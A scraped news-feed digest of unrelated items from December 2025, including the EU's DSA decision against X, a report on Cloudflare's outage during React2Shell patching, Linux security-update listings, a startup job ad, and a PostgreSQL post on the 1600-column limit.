"Deceiving users with blue checkmarks, obscuring information on ads and shutting out researchers have no place online in the EU. The DSA protects users. The DSA gives researchers the way to uncover potential threats," said Henna Virkkunen, the bloc's executive vice president for tech sovereignty.

"The DSA restores trust in the online environment. With the DSA's first non-compliance decision, we are holding X responsible for undermining users' rights and evading accountability."

The commission said that X now has 60 working days to address the blue checkmark violations and 90 days to submit action plans for fixing the research access and advertising issues, and added that failure to comply could trigger additional periodic penalties.

X was designated as a Very Large Online Platform (VLOP) under the EU's DSA on 25 April 2023, following its announcement that it had reached over 45 million monthly active users in the EU.

tines

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

[$] Eventual Rust in CPython

Linux Weekly News
lwn.net
2025-12-05 14:33:09
Emma Smith and Kirill Podoprigora, two of Python's core developers, have opened a discussion about including Rust code in CPython, the reference implementation of the Python programming language. Initially, Rust would only be used for optional extension modules, but they would like to see Rust beco...
Original Article

The page you have tried to view ( Eventual Rust in CPython ) is currently available to LWN subscribers only.

Reader subscriptions are a necessary way to fund the continued existence of LWN and the quality of its content.

If you are already an LWN.net subscriber, please log in with the form below to read this content.

Please consider subscribing to LWN . An LWN subscription provides numerous benefits, including access to restricted content and the warm feeling of knowing that you are helping to keep LWN alive.

(Alternatively, this item will become freely available on December 18, 2025)

It'll Be Left Vs. Left for Nydia Velázquez's Open Seat

hellgate
hellgatenyc.com
2025-12-05 14:32:09
And more links to start your Friday....
Original Article

The Hell Gate Podcast is the best way to start your freezing weekend! A fresh episode will drop later today. Listen here , or wherever you get your podcasts


In congressional districts around the city , primary battles are shaping up, pitting moderates against the left. Then there's Representative Nydia Velázquez's Brooklyn and Queens district, where the fight will be…left vs. further left.

The district lies at the heart of the " Commie Corridor ," encompassing neighborhoods including Williamsburg, Greenpoint, Ridgewood, and Bushwick. Velázquez announced last month that she would step down, taking the city's political class by surprise because in Congress, bowing out at the age of 72 is considered early retirement.

Brooklyn Borough President Antonio Reynoso kicked off his campaign for the seat on Thursday, the first candidate to formally enter the race. The Democratic Socialists of America are expected to put up their own candidate and make a strong play for the district, which is one of their best shots to pick up a congressional seat next year.

"The fight must continue. And I'm ready to step up," Reynoso said in a launch video , filmed mostly in Spanish on the south side of Williamsburg where he grew up.

Reynoso is firmly in the progressive wing of the Democratic Party, but not a DSA member.

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

Security updates for Friday

Linux Weekly News
lwn.net
2025-12-05 14:12:53
Security updates have been issued by AlmaLinux (buildah, firefox, gimp:2.8, go-toolset:rhel8, ipa, kea, kernel, kernel-rt, pcs, qt6-qtquick3d, qt6-qtsvg, systemd, and valkey), Debian (chromium and unbound), Fedora (alexvsbus, CuraEngine, fcgi, libcoap, python-kdcproxy, texlive-base, timg, and xpdf),...
Original Article
Dist. ID Release Package Date
AlmaLinux ALSA-2025:22012 10 buildah 2025-12-05
AlmaLinux ALSA-2025:22363 8 firefox 2025-12-05
AlmaLinux ALSA-2025:22417 8 gimp:2.8 2025-12-05
AlmaLinux ALSA-2025:22668 8 go-toolset:rhel8 2025-12-05
AlmaLinux ALSA-2025:20994 10 ipa 2025-12-05
AlmaLinux ALSA-2025:21038 10 kea 2025-12-05
AlmaLinux ALSA-2025:21931 10 kernel 2025-12-05
AlmaLinux ALSA-2025:22388 8 kernel 2025-12-05
AlmaLinux ALSA-2025:22387 8 kernel-rt 2025-12-05
AlmaLinux ALSA-2025:21036 10 pcs 2025-12-05
AlmaLinux ALSA-2025:22361 10 qt6-qtquick3d 2025-12-05
AlmaLinux ALSA-2025:22394 10 qt6-qtsvg 2025-12-05
AlmaLinux ALSA-2025:22660 9 systemd 2025-12-04
AlmaLinux ALSA-2025:21936 10 valkey 2025-12-05
Debian DSA-6072-1 stable chromium 2025-12-04
Debian DSA-6071-1 stable unbound 2025-12-04
Fedora FEDORA-2025-fc872e9426 F42 CuraEngine 2025-12-05
Fedora FEDORA-2025-19c65f1d15 F43 CuraEngine 2025-12-05
Fedora FEDORA-2025-9831accfe9 F42 alexvsbus 2025-12-05
Fedora FEDORA-2025-673ec8d684 F43 alexvsbus 2025-12-05
Fedora FEDORA-2025-67511a59e3 F41 fcgi 2025-12-05
Fedora FEDORA-2025-d7c1457e7e F42 fcgi 2025-12-05
Fedora FEDORA-2025-93042e260c F43 fcgi 2025-12-05
Fedora FEDORA-2025-6a43695048 F42 libcoap 2025-12-05
Fedora FEDORA-2025-d408d76c4a F43 libcoap 2025-12-05
Fedora FEDORA-2025-3075610004 F41 python-kdcproxy 2025-12-05
Fedora FEDORA-2025-068c570cbf F42 python-kdcproxy 2025-12-05
Fedora FEDORA-2025-3f9b87b0e7 F43 python-kdcproxy 2025-12-05
Fedora FEDORA-2025-e72c726192 F42 texlive-base 2025-12-05
Fedora FEDORA-2025-7c5b6a3bcb F43 texlive-base 2025-12-05
Fedora FEDORA-2025-f0df882417 F42 timg 2025-12-05
Fedora FEDORA-2025-d2b7d94014 F43 timg 2025-12-05
Fedora FEDORA-2025-e72c726192 F42 xpdf 2025-12-05
Fedora FEDORA-2025-7c5b6a3bcb F43 xpdf 2025-12-05
Mageia MGASA-2025-0316 9 digikam, darktable, libraw 2025-12-05
Mageia MGASA-2025-0317 9 gnutls 2025-12-05
Mageia MGASA-2025-0320 9 python-django 2025-12-05
Mageia MGASA-2025-0318 9 unbound 2025-12-05
Mageia MGASA-2025-0319 9 webkit2 2025-12-05
Mageia MGASA-2025-0321 9 xkbcomp 2025-12-05
Oracle ELSA-2025-21034 OL10 bind 2025-12-05
Oracle ELSA-2025-21281 OL10 firefox 2025-12-05
Oracle ELSA-2025-22417 OL8 gimp:2.8 2025-12-05
Oracle ELSA-2025-21691 OL10 haproxy 2025-12-05
Oracle ELSA-2025-20994 OL10 ipa 2025-12-05
Oracle ELSA-2025-21485 OL10 java-25-openjdk 2025-12-05
Oracle ELSA-2025-21006 OL10 kea 2025-12-05
Oracle ELSA-2025-21038 OL10 kea 2025-12-05
Oracle ELSA-2025-21118 OL10 kernel 2025-12-05
Oracle ELSA-2025-21463 OL10 kernel 2025-12-05
Oracle ELSA-2025-21032 OL10 libsoup3 2025-12-05
Oracle ELSA-2025-21013 OL10 libssh 2025-12-05
Oracle ELSA-2025-20998 OL10 libtiff 2025-12-05
Oracle ELSA-2025-21248 OL10 openssl 2025-12-05
Oracle ELSA-2025-20983 OL10 podman 2025-12-05
Oracle ELSA-2025-21220 OL10 podman 2025-12-05
Oracle ELSA-2025-21037 OL10 qt6-qtsvg 2025-12-05
Oracle ELSA-2025-21002 OL10 squid 2025-12-05
Oracle ELSA-2025-22660 OL9 systemd 2025-12-05
Oracle ELSA-2025-21015 OL10 vim 2025-12-05
Oracle ELSA-2025-21035 OL10 xorg-x11-server-Xwayland 2025-12-05
Slackware SSA:2025-338-01 httpd 2025-12-04
Slackware SSA:2025-338-02 libpng 2025-12-04
SUSE openSUSE-SU-2025:15794-1 TW chromedriver 2025-12-04
SUSE SUSE-SU-2025:4320-1 SLE15 SLE-m5.5 oS15.5 kernel 2025-12-04
SUSE openSUSE-SU-2025:0461-1 osB15 python-mistralclient 2025-12-04
SUSE openSUSE-SU-2025:0460-1 osB15 python-mistralclient 2025-12-04
Ubuntu USN-7912-2 16.04 18.04 20.04 cups 2025-12-04
Ubuntu USN-7912-1 22.04 24.04 25.04 25.10 cups 2025-12-04
Ubuntu USN-7910-2 22.04 linux-azure 2025-12-05
Ubuntu USN-7909-4 22.04 linux-gcp, linux-gke, linux-gkeop 2025-12-05
Ubuntu USN-7906-2 25.10 linux-gcp 2025-12-05
Ubuntu USN-7889-5 22.04 linux-ibm-6.8 2025-12-05
Ubuntu USN-7874-3 20.04 linux-iot 2025-12-04
Ubuntu USN-7913-1 18.04 20.04 22.04 24.04 25.04 25.10 mame 2025-12-04

Emerge Career (YC S22) Is Hiring

Hacker News
www.ycombinator.com
2025-12-05 14:06:53
Comments...
Original Article

All-in-one re-entry & workforce development training platform

Founding Design Engineer

$120K - $200K 0.25% - 1.00% New York, NY, US

Role

Engineering, Full stack

Connect directly with founders of the best YC-funded startups.

Apply to role ›

About the role

Who We Are:

Emerge Career’s mission is to break the cycle of poverty and incarceration. We’re not just building software; we’re creating pathways to real second chances. Through an all-in-one platform deeply embedded within the criminal justice system, we recruit, train, and place justice-impacted individuals into life-changing careers.

Our vision is to become the country’s unified workforce development system, replacing disconnected brick-and-mortar job centers with one integrated, tech-powered solution that meets low-income individuals exactly where they are. Today, the federal government spends billions annually on education and training programs, yet only about 70% of participants graduate, just 38.6% secure training-related employment, and average first-year earnings hover around $34,708.

By contrast, our seven-person team has already outperformed the job centers in two entire states (Vermont and South Dakota) in just the past year. With an 89% graduation rate and 92% of graduates securing training-related employment, our alumni aren’t just getting jobs—they’re launching new lives with average first-year earnings of $77,352. The results speak for themselves, and we’re just getting started.

Before Emerge, our founders Zo and Gabe co-founded Ameelio, an award-winning tech nonprofit that is dismantling the prison communication duopoly. Backed by tech luminaries like Reid Hoffman, Vinod Khosla, and Jack Dorsey, and by major criminal-justice philanthropies such as Arnold Ventures and the Mellon Foundation, Ameelio became a recognized leader in the space. Because of this experience both Zo and Gabe understood what it took to create change from within the system. After serving over 1M people impacted by incarceration, they witnessed firsthand the gap in second-chance opportunities and the chronic unemployment plaguing those impacted by the justice system. Emerge Career is committed to solving this issue.

Our students are at the heart of our work. Their journeys have captured national attention on CBS , NBC , and in The Boston Globe , and our programs now serve entire states and cities . And we’re not doing it alone: our vision has attracted support from Alexis Ohanian (776),  Michael Seibel, Y Combinator, the Opportunity Fund, and public figures like Diana Taurasi, Deandre Ayton, and Marshawn Lynch. All of us believe that, with the right mix of technology and hands-on practice, we can redefine workforce development and deliver true second chances at scale.

Why We Do This:

Emerge Career was designed to tackle two systemic issues: recidivism, fueled by post-incarceration unemployment and poverty, and labor shortages in key industries. Over 60% of formerly incarcerated people remain unemployed a year after incarceration , seeking work but not finding it. The reality is shocking, workforce development programs are severely limited inside prison, with only one-third of incarcerated people ever participating . To worsen, the available prison jobs offer meager wages, often less than $1 per hour , and often do not equip individuals with the skills for long-term stable employment.

About the Role

We call this a Founding Design Engineer role—even three years in and with multiple contracts under our belt—for two reasons. First, you’ll be our very first engineer, joining our co-founder, who’s built the entire platform solo to date. Second, our growth is now outpacing our systems, and we can’t keep up on maintenance alone. We’re at a critical juncture: we can either hire someone to simply care for what exists, or we can bring on a talent who believes that, with the right blend of technology and hands-on practice, we can unify the workforce-development system and deliver second chances at true scale. We hope that can be you.

This is not a traditional engineering job. You’ll do high-impact technical work, but just as often you’ll be on the phone with a student, writing documentation, debugging support issues, or figuring out how to turn a one-off solution into a repeatable system. You’ll ship features, talk to users, and fix what’s broken, whether that’s in the product or in the process. You’ll build things that matter, not just things that are asked for.

This role blends engineering, product, support, and program operations. We’re looking for someone who is energized by ownership, obsessed with user outcomes, and excited to work across domains to make things better. If you’re the kind of person who wants to be hands-on with everything—students, code, strategy, and execution—you’ll thrive here.

Who You Are:

  1. You love supporting other people’s growth. This role will feel like case work at times, and you’re drawn to that. You’ve dedicated your life volunteering, working in social impact, or finding ways to make the playing field more fair. You find joy in helping others rise. You don’t hesitate to call, text, or meet with a student who needs you. You show up consistently, personally, and with heart.
  2. You believe everyone deserves a second chance. You treat everyone with dignity. You know how to meet people exactly where they are—with empathy and compassion—helping create a space where everyone feels seen and valued, regardless of their background..
  3. You identify yourself as a cracked engineer. You love finding a way or making one. You take extreme ownership of ideas, driving them to completion even when others need convincing. Every time you hit a wall, you think of three new ways to solve the issue.
  4. You are tech-forward, but not tech-first. You look for ways to automate and scale, but you know not everything should be automated. You believe that with the right builder mindset, one coach can support hundreds of individuals—but you also understand that in a program like ours, many moments require a human touch. You know when to hand it to a system, and when to pick up the phone.
  5. You are entrepreneurial. You’re scrappy, resourceful, autonomous, and low-maintenance. You know process matters—but at this stage, speed and iteration matter more. You’re comfortable building quickly and changing procedures often to get to the right solution. You roll up your sleeves and solve problems. No job is too small.
  6. You play to win. You stay optimistic when things get tough and keep moving when others slow down. You’re not rattled by change or new ideas. You don’t need to agree with everything, but you bring a “yes, and” mindset that helps ideas grow instead of shutting them down.
  7. You work hard . You show up early, stay late, and do what needs to get done—no ego, no excuses. You don’t wait around or ask for permission. This isn’t a 9-to-5. The team puts in 10+ hour days because we care about the mission and each other. If that sounds miserable, this isn’t for you. If it sounds exciting, you’ll fit right in.
  8. You are a straight shooter. You don’t shy away from hard conversations—internally or externally. You bring clarity, care, and accountability to every interaction.
  9. You love learning. You understand that recent advancements in AI have shifted the way we work and what it means to be a high performer. You tinker with new tools. You enjoy being an early adopter. You’re always rethinking and optimizing how you work so you can keep leveling up. Nobody needs to tell you to keep upping your game.
  10. You have an eye for operational detail. This doesn’t mean you’re simply organized. At Emerge, operational excellence isn’t just about efficiency—it’s about protecting the real lives and futures of the people in our programs. You have an almost paranoid attention to detail, because you understand that even small oversights have real, human consequences.
  11. You are a clear writer. This doesn’t mean you need to craft the next great novel, but you must communicate ideas simply and clearly. You value precision, clarity, and brevity. You understand that good writing reduces confusion, accelerates decisions, and ensures everyone stays aligned, especially in high-stakes environments like ours.
  12. You are a strong prompter. You’ve seen firsthand how a few thoughtful prompts can transform messy tasks into scalable, repeatable AI workflows. You love tinkering with prompts, contexts, and configurations to get exactly the right outputs, and you take pride in turning cutting-edge AI into practical processes that anyone can use.

Requirements

  • Willing to relocate and work in-person in New York City
  • Experience taking a project from 0 to 1. You might have led a project, been a founder previously, built an impressive side project, or been one of the first 10 employees at an early stage startup
  • You love working with React and Typescript
  • Experience with Figma
  • Experience collaborating with operations or support teams

Bonus Points

  • Experience in ed-tech
  • Experience with UX research

What you will be doing

  • Coaching students. You’ll support students throughout their training journey—not just by building tools, but by directly engaging with them. This means texting, calling, and helping students one-on-one when needed. At the same time, you’ll take what you learn from those interactions and turn it into scalable systems and smart automations. You’ll be doing both engineering and non-engineering work to make sure students succeed and the product keeps improving.
  • Talking to students. Good founding engineers read feedback and iterate quickly. Great founding engineers have users they're friendly with, talk with them frequently, bounce ideas off them, and iterate with them when they ship new things.
  • Doing support . This is an engineering role with key program management responsibilities. You’ll work directly with students every day. That requires patience, empathy, and a willingness to meet people where they are. You’ll help investigate and resolve product issues, and you’ll take ownership of making the product better through what you learn.
  • Documenting your work and its impact. Our work is complex, spans months, and involves multiple teams. Clear documentation and communication are critical. You’ll be responsible for creating awareness when a change impacts operations, and for helping others understand how features affect different parts of training and service delivery. Precision matters.
  • Owning products and features end to end . You won’t just take tickets. You’ll originate ideas based on user conversations, your own instincts, and our larger strategy. You’ll test MVPs in production, iterate based on real feedback, and stay accountable to the long-term success of your work. We build in React and TypeScript. If you like shipping for the sake of it, this role isn’t for you. If you like shipping with purpose and ownership, you’ll love it here.
  • Implementing AI features and operational workflows . This is last for a reason. We don’t jump to automation. We do things manually first to fully understand the problem—then we build. If you care about applying AI meaningfully, not just for hype, this is the right place.

Benefits You’ll Receive: link

Start Date: ASAP

About the interview

  1. Application
  2. Cultural fit conversation & technical screen (60 min)
  3. Getting to know you interview (60 min): A more in-depth discussion about your background, experiences, and goals.
  4. Reference checks. We will select 3–4 people you’ve worked with and request introductions. We will request these when the time comes. We’re looking for honest and raw references, not flawless ones.
  5. Paid Work Trial (2-5 days). You’ll come onsite to work on a real project, with access to internal tools and team collaboration. You’ll be paid $500 per day. All travel expenses will be covered.

About Emerge Career

Emerge Career

Founded: 2022

Batch: S22

Team Size: 3

Status: Active

Founders

Cloudflare blames today's outage on emergency React2Shell patch

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 13:53:26
Cloudflare has blamed today's outage on the emergency patching of a critical React remote code execution vulnerability, which is now actively exploited in attacks. [...]...
Original Article

Cloudflare

Earlier today, Cloudflare experienced a widespread outage that caused websites and online platforms worldwide to go down, returning a "500 Internal Server Error" message.

In a status page update, the internet infrastructure company has now blamed the incident on an emergency patch designed to address a critical remote code execution vulnerability in React Server Components, which is now actively exploited in attacks.

"A change made to how Cloudflare's Web Application Firewall parses requests caused Cloudflare's network to be unavailable for several minutes this morning," Cloudflare said .

"This was not an attack; the change was deployed by our team to help mitigate the industry-wide vulnerability disclosed this week in React Server Components. We will share more information as we have it today."

Tracked as CVE-2025-55182 , this maximum severity security flaw (dubbed React2Shell) affects the React open-source JavaScript library for web and native user interfaces, as well as dependent React frameworks such as Next.js, React Router, Waku, @parcel/rsc, @vitejs/plugin-rsc, and RedwoodSDK.

The vulnerability was found in the React Server Components (RSC) 'Flight' protocol, and it allows unauthenticated attackers to gain remote code execution in React and Next.js applications by sending maliciously crafted HTTP requests to React Server Function endpoints.

While multiple React packages in their default configuration (i.e., react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack) are vulnerable, the flaw only affects React versions 19.0, 19.1.0, 19.1.1, and 19.2.0 released during the past year.

Ongoing React2Shell exploitation

Although the impact is not as widespread as initially believed, security researchers with Amazon Web Services (AWS) have reported that multiple China-linked hacking groups (including Earth Lamia and Jackpot Panda) have begun exploiting the React2Shell vulnerability hours after the max-severity flaw was disclosed.

The NHS England National CSOC also said on Thursday that several functional CVE-2025-55182 proof-of-concept exploits are already available and warned that "continued successful exploitation in the wild is highly likely."

Last month, Cloudflare experienced another worldwide outage that brought down the company's Global Network for almost 6 hours, an incident described by CEO Matthew Prince as the "worst outage since 2019."

Cloudflare fixed another massive outage in June, which caused Access authentication failures and Zero Trust WARP connectivity issues across multiple regions, and also impacted Google Cloud's infrastructure.

tines

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

"Alejandro Was Murdered": Colombian Fisherman's Family Files Claim Against U.S. over Boat Strike

Democracy Now!
www.democracynow.org
2025-12-05 13:51:34
The U.S. military said Thursday that it blew up another boat of suspected drug smugglers, this time killing four people in the eastern Pacific. The U.S. has now killed at least 87 people in 22 strikes since September. The U.S. has not provided proof as to the vessels’ activities or the identit...
Original Article

The U.S. military said Thursday that it blew up another boat of suspected drug smugglers, this time killing four people in the eastern Pacific. The U.S. has now killed at least 87 people in 22 strikes since September. The U.S. has not provided proof as to the vessels’ activities or the identities of those on board who were targeted, but now the family of a fisherman from Colombia has filed the first legal challenge to the military strikes. In a petition filed with the Inter-American Commission on Human Rights, the family says a strike on September 15 killed 42-year-old Alejandro Andres Carranza Medina, a fisherman from Santa Marta and father of four. His family says he was fishing for tuna and marlin off Colombia’s Caribbean coast when his boat was bombed, and was not smuggling drugs.

“Alejandro was murdered,” says international human rights attorney Dan Kovalik, who filed the legal petition on behalf of the family. “This is not how a civilized nation should act, just murdering people on the high seas without proof, without trial.”


Please check back later for full transcript.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Influential study on glyphosate safety retracted 25 years after publication

Hacker News
www.lemonde.fr
2025-12-05 13:39:04
Comments...
Original Article

A 2000 study that concluded the well-known herbicide glyphosate was safe, widely cited since then, has just been officially disavowed by the journal that published it. The scientists are suspected of having signed a text actually prepared by Monsanto.

Lire en français

Subscribers only

A person holds up a sign during a protest against the authorization of glyphosate-based herbicide, in Rennes, on October 12, 2023.

A quarter-century after its publication, one of the most influential research articles on the potential carcinogenicity of glyphosate has been retracted for "several critical issues that are considered to undermine the academic integrity of this article and its conclusions." In a retraction notice dated Friday, November 28, the journal Regulatory Toxicology and Pharmacology announced that the study, published in April 2000 and concluding the herbicide was safe, has been removed from its archives. The disavowal comes 25 years after publication and eight years after thousands of internal Monsanto documents were made public during US court proceedings (the "Monsanto Papers"), revealing that the actual authors of the article were not the listed scientists – Gary M. Williams (New York Medical College), Robert Kroes (Ritox, Utrecht University, Netherlands), and Ian C. Munro (Intertek Cantox, Canada) – but rather Monsanto employees.

Known as "ghostwriting," this practice is considered a form of scientific fraud. It involves companies paying researchers to sign their names to research articles they did not write. The motivation is clear: When a study supports the safety of a pesticide or drug, it appears far more credible if not authored by scientists employed by the company marketing the product.

You have 73.89% of this article left to read. The rest is for subscribers only.

Vous pouvez lire Le Monde sur un seul appareil à la fois

Ce message s’affichera sur l’autre appareil.

Ajouter un compte Découvrir l’offre Famille Découvrir les offres multicomptes
  • Parce qu’une autre personne (ou vous) est en train de lire Le Monde avec ce compte sur un autre appareil.

    Vous ne pouvez lire Le Monde que sur un seul appareil à la fois (ordinateur, téléphone ou tablette).

  • Comment ne plus voir ce message ?

    En cliquant sur «  » et en vous assurant que vous êtes la seule personne à consulter Le Monde avec ce compte.

  • Vous ignorez qui est l’autre personne ?

    Nous vous conseillons de modifier votre mot de passe .

  • Que se passera-t-il si vous continuez à lire ici ?

    Ce message s’affichera sur l’autre appareil. Ce dernier restera connecté avec ce compte.

  • Y a-t-il d’autres limites ?

    Non. Vous pouvez vous connecter avec votre compte sur autant d’appareils que vous le souhaitez, mais en les utilisant à des moments différents.

  • Parce qu’une autre personne (ou vous) est en train de lire Le Monde avec ce compte sur un autre appareil.

    Vous ne pouvez lire Le Monde que sur un seul appareil à la fois (ordinateur, téléphone ou tablette).

  • Comment ne plus voir ce message ?

    Si vous utilisez ce compte à plusieurs, créez un compte pour votre proche (inclus dans votre abonnement). Puis connectez-vous chacun avec vos identifiants. Sinon, cliquez sur «  » et assurez-vous que vous êtes la seule personne à consulter Le Monde avec ce compte.

  • Vous ignorez qui d’autre utilise ces identifiants ?

    Nous vous conseillons de modifier votre mot de passe .

  • Que se passera-t-il si vous continuez à lire ici ?

    Ce message s’affichera sur l’autre appareil. Ce dernier restera connecté avec ce compte.

  • Y a-t-il d’autres limites ?

    Non. Vous pouvez vous connecter avec votre compte sur autant d’appareils que vous le souhaitez, mais en les utilisant à des moments différents.

  • Parce qu’une autre personne (ou vous) est en train de lire Le Monde avec ce compte sur un autre appareil.

    Vous ne pouvez lire Le Monde que sur un seul appareil à la fois (ordinateur, téléphone ou tablette).

  • Comment ne plus voir ce message ?

    Si vous êtes bénéficiaire de l’abonnement, connectez-vous avec vos identifiants. Si vous êtes 3 ou plus à utiliser l’abonnement, passez à l’offre Famille . Sinon, cliquez sur «  » et assurez-vous que vous êtes la seule personne à consulter Le Monde avec ce compte.

  • Vous ignorez qui d’autre utilise ces identifiants ?

    Nous vous conseillons de modifier votre mot de passe .

  • Que se passera-t-il si vous continuez à lire ici ?

    Ce message s’affichera sur l’autre appareil. Ce dernier restera connecté avec ce compte.

  • Y a-t-il d’autres limites ?

    Non. Vous pouvez vous connecter avec votre compte sur autant d’appareils que vous le souhaitez, mais en les utilisant à des moments différents.

  • Parce qu’une autre personne (ou vous) est en train de lire Le Monde avec ce compte sur un autre appareil.

    Vous ne pouvez lire Le Monde que sur un seul appareil à la fois (ordinateur, téléphone ou tablette).

  • Comment ne plus voir ce message ?

    Si vous êtes bénéficiaire de l’abonnement, connectez-vous avec vos identifiants. Sinon, cliquez sur «  » et assurez-vous que vous êtes la seule personne à consulter Le Monde avec ce compte.

  • Vous ignorez qui d’autre utilise ce compte ?

    Nous vous conseillons de modifier votre mot de passe .

  • Que se passera-t-il si vous continuez à lire ici ?

    Ce message s’affichera sur l’autre appareil. Ce dernier restera connecté avec ce compte.

  • Y a-t-il d’autres limites ?

    Non. Vous pouvez vous connecter avec votre compte sur autant d’appareils que vous le souhaitez, mais en les utilisant à des moments différents.

  • Parce qu’une autre personne (ou vous) est en train de lire Le Monde avec ce compte sur un autre appareil.

    Vous ne pouvez lire Le Monde que sur un seul appareil à la fois (ordinateur, téléphone ou tablette).

  • Comment ne plus voir ce message ?

    Si vous utilisez ce compte à plusieurs, passez à une offre multicomptes pour faire profiter vos proches de votre abonnement avec leur propre compte. Sinon, cliquez sur «  » et assurez-vous que vous êtes la seule personne à consulter Le Monde avec ce compte.

  • Vous ignorez qui d’autre utilise ce compte ?

    Nous vous conseillons de modifier votre mot de passe .

  • Que se passera-t-il si vous continuez à lire ici ?

    Ce message s’affichera sur l’autre appareil. Ce dernier restera connecté avec ce compte.

  • Y a-t-il d’autres limites ?

    Non. Vous pouvez vous connecter avec votre compte sur autant d’appareils que vous le souhaitez, mais en les utilisant à des moments différents.

  • Parce qu’une autre personne (ou vous) est en train de lire Le Monde avec ce compte sur un autre appareil.

    Vous ne pouvez lire Le Monde que sur un seul appareil à la fois (ordinateur, téléphone ou tablette).

  • Comment ne plus voir ce message ?

    En cliquant sur «  » et en vous assurant que vous êtes la seule personne à consulter Le Monde avec ce compte.

  • Que se passera-t-il si vous continuez à lire ici ?

    Ce message s’affichera sur l’autre appareil. Ce dernier restera connecté avec ce compte.

  • Y a-t-il d’autres limites ?

    Non. Vous pouvez vous connecter avec votre compte sur autant d’appareils que vous le souhaitez, mais en les utilisant à des moments différents.

  • Vous ignorez qui est l’autre personne ?

    Nous vous conseillons de modifier votre mot de passe .

Lecture restreinte

Votre abonnement n’autorise pas la lecture de cet article

Pour plus d’informations, merci de contacter notre service commercial.

Trump Calls Somali Community "Garbage": Minnesota Responds to Racist Rant and Immigration Sweeps

Democracy Now!
www.democracynow.org
2025-12-05 13:35:00
Federal authorities are carrying out intensified operations this week in Minnesota as President Donald Trump escalates his attacks on the Somali community in the state. The administration halted green card and citizenship applications from Somalis and people from 18 other countries after last week&#...
Original Article

Federal authorities are carrying out intensified operations this week in Minnesota as President Donald Trump escalates his attacks on the Somali community in the state. The administration halted green card and citizenship applications from Somalis and people from 18 other countries after last week’s fatal shooting near the White House. During a recent Cabinet meeting, Trump went on a racist tirade against the Somali community, saying, “We don’t want them in our country,” and referring to Somali immigrants as “garbage.” Minnesota has the largest Somali community in the United States, and the vast majority of the estimated 80,000 residents in the state are American citizens or legal permanent residents.

“We have seen vile things that the president has said, but in these moments, we need to come together and respond,” says Jaylani Hussein, the executive director of CAIR -Minnesota. He also highlights the connections between Trump’s targeting of the community and foreign policy. “If you demonize Muslims, then you can get away with killing Muslims abroad. This has always been the case, from the Afghanistan War to the Iraq War.”



Guests

Please check back later for full transcript.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

The 1600 columns limit in PostgreSQL - how many columns fit into a table

Lobsters
andreas.scherbaum.la
2025-12-05 13:33:05
Comments...
Original Article

A recent blog posting by Frédéric Delacourt ( Did you know? Tables in PostgreSQL are limited to 1,600 columns ) reminded me once again that in the analytics world customers sometimes ask for more than 1600 columns.

Quick recap: in OLTP , the aim is (usually) to use the 3rd normal form . In OLAP , tables are often only vaguely normalized, and wide or very wide fact tables in 2nd normal form are quite common. But are 1600 columns a bad idea? Yes. Do some applications generate such wide tables? Also yes. I’ve seen my fair share of customer requests and support tickets asking if the 1600 columns limit can be raised or even lifted.

But is that possible?

Why is there a limit

In PostgreSQL , a single row must fit into a single page on disk. The disk page size, by default, is 8 kB . As Frédéric shows in tests in his blog posting, sometimes even a smaller number of columns does not fit into the page.

Now my analytics background is not only with PostgreSQL . but also with WarehousePG (a Greenplum fork) and with Greenplum itself. In WarehousePG the default page size is 32 kB . Will this increase the number of columns? Unfortunately not:

1
2
3
~/sources/warehouse-pg main]$ grep -e MaxTupleAttributeNumber -e MaxHeapAttributeNumber src/include/access/htup_details.h
#define MaxTupleAttributeNumber 1664    /* 8 * 208 */
#define MaxHeapAttributeNumber  1600    /* 8 * 200 */

The fork is still using the same values for MaxTupleAttributeNumber and MaxHeapAttributeNumber , limited to 1600 columns. There’s also a comment near MaxHeapAttributeNumber in src/include/access/htup_details.h :

1
2
3
 * In any case, depending on column data types you will likely be running
 * into the disk-block-based limit on overall tuple size if you have more
 * than a thousand or so columns.  TOAST won't help.

Is it possible to increase the limit

It is possible to increase these limits, and create tables with a couple thousand columns. Theoretically, a single page fits 8136 single byte columns (like a BOOLEAN ) in PostgreSQL . In WarehousePG this even fits 32712 single byte columns. But that is not the real limit.

The HeapTupleHeader has the t_infomask2 field, which is a uint16 (unsigned integer), defined in access/htup_details.h . Out of the available bits, 11 are used for the number of attributes:

1
#define HEAP_NATTS_MASK			0x07FF	/* 11 bits for number of attributes */

And 11 bits is 2047 attributes. Any tuple can have a maximum of 2047 attributes, even with all the 1600 safeguards increased or removed. In practice, it’s 2041 attributes. When inserting/updating a table, the database will not write more than those 2041 columns, all other columns are not set. If the column definition of the higher columns is NOT NULL , the INSERT or UPDATE fails with a constraint violation. Otherwise the higher columns ares simply set to NULL .

Bottom line: while the table can have many more columns, the database can’t write anything into these additional columns. Not without fully refactoring the way tuples are created internally.

Conclusion

In theory it is possible to raise the 1600 columns limit to a slightly larger number. In practice it is not worth the small gain, and is pushing internal safety boundaries built into the database.

Also in practice this will have all type of mostly unintended side effects and problems. This is untested territory, all unit tests must be updated as well. Tools like psql have a built-in limitation as well, which also must be raised. This in turn requires always using the patched binary, it might no longer be possible to use a “standard” psql against this database. Other tools might have problems as well with very wide tables.

Exporting the data is possible, but the table can no longer be imported into an unpatched version of the database. This basically creates a fork of a fork, which must be maintained and updated for every new minor and major version.

tl;dr: Don’t do this.

Thank you

Thanks to Robert Haas for reviewing the code assumptions about larger number of columns.



Comments

With an account on the Fediverse or Mastodon, you can respond to this post . Known replies are displayed below:

Learn how this is implemented here .


Share:


Layoutz – Simple, beautiful CLI output for Haskell 🪶

Lobsters
flora.pm
2025-12-05 13:27:25
Comments...
Original Article

Simple, beautiful CLI output for Haskell 🪶

